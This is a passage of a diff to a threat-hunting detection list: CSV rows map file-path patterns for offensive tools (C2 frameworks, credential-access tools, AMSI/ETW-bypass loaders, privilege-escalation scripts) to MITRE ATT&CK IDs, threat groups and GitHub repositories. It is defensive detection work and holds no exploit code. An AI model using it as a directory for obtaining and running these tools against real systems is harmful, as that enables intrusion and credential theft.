TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_recon/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_sniff_*.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/netbus-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/netcreds.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/NetExec.git*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*/NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*/netcreds.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/NetExec.git*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/Net-GPPPassword.git*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. 
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*/nethunter-images/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NetLoader.git*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" -"*/netntlm.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/netntlm.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/NetNTLMtoSilverTicket*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential 
Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*/netsparker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/netstat_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/nettitude/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - 
T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/netsparker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/netstat_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/nettitude/*","offensive_tool_keyword","poshc2","keywords 
from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*/nettitude/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/NetUser.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when 
net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*/NetUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" -"*/netuserenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*/network/bloodhound3*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/Network/PortScan/*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/netuserenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/network/bloodhound3*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Network/PortScan/*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/Newtonsoft.Json.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*/nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -4475,7 +4511,7 @@ "*/nfs-statfs.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nginxed-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/nidem/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 